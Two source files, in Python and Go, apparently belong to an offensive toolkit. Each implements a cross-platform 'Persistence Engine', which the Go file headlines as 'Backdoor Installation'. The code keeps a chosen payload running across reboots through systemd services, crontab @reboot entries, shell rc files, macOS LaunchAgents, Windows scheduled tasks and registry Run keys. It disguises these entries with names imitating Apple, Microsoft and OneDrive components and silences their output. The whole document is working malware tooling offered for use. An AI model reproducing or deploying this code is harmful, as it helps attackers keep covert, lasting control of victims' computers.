File: modules/persistence.py
"""
modules/persistence.py — Cross-Platform Persistence Engine
FIXES:
  - Added run_persistence() entry point callable from main.py
  - PersistenceEngine class unchanged
"""

import os
import sys
import platform
import subprocess
import questionary
from rich.console import Console
from core.ui import draw_header, Q_STYLE

console = Console()


# ─────────────────────────────────────────────────────────────────────────────
#  ENGINE
# ─────────────────────────────────────────────────────────────────────────────

class PersistenceEngine:
    def __init__(self, path: str):
        self.path = path
        self.os_type = platform.system()   # "Linux" | "Darwin" | "Windows"

    # ── Linux ─────────────────────────────────────────────────────────────────

    def install_linux_watchdog(self):
        """Systemd service that auto-restarts the payload on crash."""
        service_name = "system-network-monitor"
        service_body = f"""[Unit]
Description=Network Monitor Service
After=network.target

[Service]
ExecStart={self.path}
Restart=always
RestartSec=30

[Install]
WantedBy=multi-user.target
"""
        service_path = f"/etc/systemd/system/{service_name}.service"
        try:
            with open(service_path, "w") as f:
                f.write(service_body)
            subprocess.run(["systemctl", "daemon-reload"],         check=True)
            subprocess.run(["systemctl", "enable", service_name],  check=True)
            subprocess.run(["systemctl", "start",  service_name],  check=True)
            console.print(
                f"[bold green][+] Linux persistence established via systemd "
                f"({service_name}).[/bold green]")
        except PermissionError:
            # Fallback: user crontab
            try:
                cron_job = f"@reboot {self.path}\n"
                result = subprocess.run(
                    "crontab -l 2>/dev/null", shell=True,
                    capture_output=True, text=True)
                new_cron = result.stdout + cron_job
                subprocess.run(
                    f'echo "{new_cron}" | crontab -',
                    shell=True, check=True)
                console.print(
                    "[bold green][+] Linux persistence established via user crontab.[/bold green]")
            except Exception as e:
                console.print(f"[red][!] Crontab fallback failed: {e}[/red]")
        except Exception as e:
            console.print(f"[red][!] Linux persistence failed: {e}[/red]")

    # ── macOS ─────────────────────────────────────────────────────────────────

    def install_mac_launchagent(self):
        """LaunchAgent plist in ~/Library/LaunchAgents/."""
        label = "com.apple.systemupdated"
        plist = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
  "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>{label}</string>
    <key>ProgramArguments</key>
    <array>
        <string>{self.path}</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>KeepAlive</key>
    <true/>
</dict>
</plist>
"""
        launch_dir = os.path.expanduser("~/Library/LaunchAgents")
        plist_path = os.path.join(launch_dir, f"{label}.plist")
        try:
            os.makedirs(launch_dir, exist_ok=True)
            with open(plist_path, "w") as f:
                f.write(plist)
            subprocess.run(["launchctl", "load", plist_path], check=True)
            console.print(
                f"[bold green][+] macOS LaunchAgent persistence established.[/bold green]")
        except Exception as e:
            console.print(f"[red][!] macOS persistence failed: {e}[/red]")

    # ── Windows ───────────────────────────────────────────────────────────────

    def install_windows_schtask(self):
        """Scheduled task masquerading as a Windows Update component."""
        try:
            cmd = (
                f'schtasks /create /tn '
                f'"Microsoft\\Windows\\Wininet\\CacheUpdater" '
                f'/tr "{self.path}" /sc onlogon /rl highest /f'
            )
            result = subprocess.run(cmd, shell=True, capture_output=True)
            if result.returncode == 0:
                console.print(
                    "[bold green][+] Windows Scheduled Task persistence established.[/bold green]")
            else:
                console.print(
                    "[yellow][!] Scheduled task failed (may need admin). "
                    "Falling back to Registry...[/yellow]")
                import winreg
                key_path = r"Software\Microsoft\Windows\CurrentVersion\Run"
                with winreg.OpenKey(
                    winreg.HKEY_CURRENT_USER, key_path, 0,
                    winreg.KEY_SET_VALUE
                ) as reg_key:
                    winreg.SetValueEx(
                        reg_key, "OneDriveUpdate", 0,
                        winreg.REG_SZ, self.path)
                console.print(
                    "[bold green][+] Windows Registry 'Run' key established.[/bold green]")
        except Exception as e:
            console.print(f"[red][!] Windows persistence failed: {e}[/red]")

    # ── Dispatcher ────────────────────────────────────────────────────────────

    def run(self):
        console.print(
            f"[*] Deploying persistence for: [bold yellow]{self.path}[/bold yellow]")
        if self.os_type == "Linux":
            self.install_linux_watchdog()
        elif self.os_type == "Darwin":
            self.install_mac_launchagent()
        elif self.os_type == "Windows":
            self.install_windows_schtask()
        else:
            console.print(
                f"[yellow][!] OS ({self.os_type}) not supported.[/yellow]")
        questionary.press_any_key_to_continue(style=Q_STYLE).ask()


# ─────────────────────────────────────────────────────────────────────────────
#  ENTRY POINT — called by main.py
# ─────────────────────────────────────────────────────────────────────────────

def run_persistence():
    draw_header("Persistence Engine")
    console.print(
        "[dim]Installs the specified binary/script as a persistent service "
        "that survives reboots.\n"
        "Linux: systemd (root) or crontab fallback\n"
        "macOS: LaunchAgent plist\n"
        "Windows: Scheduled Task (admin) or Registry Run key fallback[/dim]\n"
    )

    path = questionary.text(
        "Full path to payload/binary to persist:",
        style=Q_STYLE
    ).ask()

    if not path:
        return

    if not os.path.exists(path):
        if not questionary.confirm(
            f"Path '{path}' not found locally. Continue anyway?",
            default=False, style=Q_STYLE
        ).ask():
            return

    PersistenceEngine(path).run()


if __name__ == "__main__":
    run_persistence()

File: internal/modules/persistence/persistence.go
package persistence

import (
	"fmt"
	"os"
	"os/exec"
	"path/filepath"
	"runtime"
	"strings"

	"github.com/bryanparreira/davoid/internal/modules/ui"
)

func Run() error {
	ui.Header("Persistence Engine — Cross-Platform Backdoor Installation")

	payloadPath := ui.Prompt("Full path to payload/binary to persist")
	if payloadPath == "" {
		return nil
	}

	if _, err := os.Stat(payloadPath); os.IsNotExist(err) {
		if !ui.Confirm(fmt.Sprintf("'%s' not found. Continue anyway?", payloadPath)) {
			return nil
		}
	}

	payloadPath, _ = filepath.Abs(payloadPath)

	fmt.Printf("\n  %s  %s\n", ui.Cyan.Render("OS"), runtime.GOOS)
	fmt.Printf("  %s  %s\n\n", ui.Cyan.Render("Payload"), payloadPath)

	switch runtime.GOOS {
	case "linux":
		return persistLinux(payloadPath)
	case "darwin":
		return persistMacOS(payloadPath)
	case "windows":
		return persistWindows(payloadPath)
	default:
		ui.Fail(fmt.Sprintf("Unsupported OS: %s", runtime.GOOS))
	}
	return nil
}

func persistLinux(payload string) error {
	method := ui.Select("Persistence Method (Linux)", []string{
		"systemd service     (root required, survives reboot)",
		"crontab @reboot     (user-level, survives reboot)",
		"~/.bashrc entry     (runs on shell login)",
	})
	if method < 0 {
		return nil
	}

	switch method {
	case 0:
		return systemdService(payload)
	case 1:
		return crontabReboot(payload)
	case 2:
		return bashrcEntry(payload)
	}
	return nil
}

func persistMacOS(payload string) error {
	method := ui.Select("Persistence Method (macOS)", []string{
		"LaunchAgent plist   (user-level, survives reboot)",
		"crontab @reboot     (user-level, survives reboot)",
		"~/.zshrc entry      (runs on shell login)",
	})
	if method < 0 {
		return nil
	}

	switch method {
	case 0:
		return launchAgent(payload)
	case 1:
		return crontabReboot(payload)
	case 2:
		return zshrcEntry(payload)
	}
	return nil
}

func persistWindows(payload string) error {
	method := ui.Select("Persistence Method (Windows)", []string{
		"Scheduled Task      (requires admin)",
		"Registry Run key    (HKCU, user-level)",
	})
	if method < 0 {
		return nil
	}

	switch method {
	case 0:
		return scheduledTask(payload)
	case 1:
		return registryRun(payload)
	}
	return nil
}

// ── Linux systemd ─────────────────────────────────────────────────────────────

func systemdService(payload string) error {
	name := ui.PromptDefault("Service name", "davoid-agent")
	unitFile := fmt.Sprintf("/etc/systemd/system/%s.service", name)

	content := fmt.Sprintf(`[Unit]
Description=System Service
After=network.target

[Service]
ExecStart=%s
Restart=always
RestartSec=5
StandardOutput=null
StandardError=null

[Install]
WantedBy=multi-user.target
`, payload)

	if err := os.WriteFile(unitFile, []byte(content), 0644); err != nil {
		ui.Fail(fmt.Sprintf("Write service file failed (need root?): %v", err))
		return nil
	}

	cmds := []string{
		"systemctl daemon-reload",
		fmt.Sprintf("systemctl enable %s", name),
		fmt.Sprintf("systemctl start %s", name),
	}
	for _, c := range cmds {
		parts := strings.Fields(c)
		if err := exec.Command(parts[0], parts[1:]...).Run(); err != nil {
			ui.Warn(fmt.Sprintf("%s: %v", c, err))
		}
	}

	ui.Success(fmt.Sprintf("systemd service '%s' installed and started.", name))
	ui.Info(fmt.Sprintf("Unit file: %s", unitFile))
	ui.PressEnter()
	return nil
}

// ── crontab @reboot ──────────────────────────────────────────────────────────

func crontabReboot(payload string) error {
	// Read existing crontab
	out, _ := exec.Command("crontab", "-l").Output()
	existing := string(out)

	entry := fmt.Sprintf("@reboot %s\n", payload)
	if strings.Contains(existing, payload) {
		ui.Warn("Entry already in crontab.")
		ui.PressEnter()
		return nil
	}

	newCron := existing + entry
	cmd := exec.Command("crontab", "-")
	cmd.Stdin = strings.NewReader(newCron)
	if err := cmd.Run(); err != nil {
		ui.Fail(fmt.Sprintf("crontab write failed: %v", err))
		return nil
	}

	ui.Success("crontab @reboot entry added.")
	ui.Info(fmt.Sprintf("Entry: %s", strings.TrimSpace(entry)))
	ui.PressEnter()
	return nil
}

// ── ~/.bashrc ────────────────────────────────────────────────────────────────

func bashrcEntry(payload string) error {
	home, _ := os.UserHomeDir()
	bashrc := filepath.Join(home, ".bashrc")

	entry := fmt.Sprintf("\n# system check\n%s &\n", payload)
	f, err := os.OpenFile(bashrc, os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0644)
	if err != nil {
		ui.Fail(fmt.Sprintf("Cannot write .bashrc: %v", err))
		return nil
	}
	f.WriteString(entry)
	f.Close()

	ui.Success(fmt.Sprintf(".bashrc persistence added: %s", bashrc))
	ui.PressEnter()
	return nil
}

// ── macOS LaunchAgent ─────────────────────────────────────────────────────────

func launchAgent(payload string) error {
	home, _ := os.UserHomeDir()
	label := ui.PromptDefault("Launch agent label", "com.apple.system.monitor")
	plistPath := filepath.Join(home, "Library/LaunchAgents", label+".plist")
	os.MkdirAll(filepath.Dir(plistPath), 0755)

	content := fmt.Sprintf(`<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>%s</string>
    <key>ProgramArguments</key>
    <array>
        <string>%s</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>KeepAlive</key>
    <true/>
    <key>StandardOutPath</key>
    <string>/dev/null</string>
    <key>StandardErrorPath</key>
    <string>/dev/null</string>
</dict>
</plist>
`, label, payload)

	if err := os.WriteFile(plistPath, []byte(content), 0644); err != nil {
		ui.Fail(fmt.Sprintf("Write plist failed: %v", err))
		return nil
	}

	exec.Command("launchctl", "load", plistPath).Run()
	ui.Success(fmt.Sprintf("LaunchAgent installed: %s", plistPath))
	ui.PressEnter()
	return nil
}

// ── ~/.zshrc ─────────────────────────────────────────────────────────────────

func zshrcEntry(payload string) error {
	home, _ := os.UserHomeDir()
	zshrc := filepath.Join(home, ".zshrc")
	entry := fmt.Sprintf("\n# system check\n%s &\n", payload)
	f, _ := os.OpenFile(zshrc, os.O_APPEND|os.O_WRONLY|os.O_CREATE, 0644)
	f.WriteString(entry)
	f.Close()
	ui.Success(fmt.Sprintf(".zshrc persistence added: %s", zshrc))
	ui.PressEnter()
	return nil
}

// ── Windows Scheduled Task ────────────────────────────────────────────────────

func scheduledTask(payload string) error {
	name := ui.PromptDefault("Task name", "SystemHealth")
	args := []string{
		"/Create", "/TN", name,
		"/TR", payload,
		"/SC", "ONLOGON",
		"/RL", "HIGHEST",
		"/F",
	}
	if err := exec.Command("schtasks", args...).Run(); err != nil {
		ui.Fail(fmt.Sprintf("schtasks failed: %v", err))
		return nil
	}
	ui.Success(fmt.Sprintf("Scheduled task '%s' created.", name))
	ui.PressEnter()
	return nil
}

// ── Windows Registry Run ──────────────────────────────────────────────────────

func registryRun(payload string) error {
	name := ui.PromptDefault("Registry value name", "SystemMonitor")
	key := `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
	args := []string{"add", key, "/v", name, "/t", "REG_SZ", "/d", payload, "/f"}
	if err := exec.Command("reg", args...).Run(); err != nil {
		ui.Fail(fmt.Sprintf("reg add failed: %v", err))
		return nil
	}
	ui.Success(fmt.Sprintf("Registry Run key added: %s", name))
	ui.PressEnter()
	return nil
}

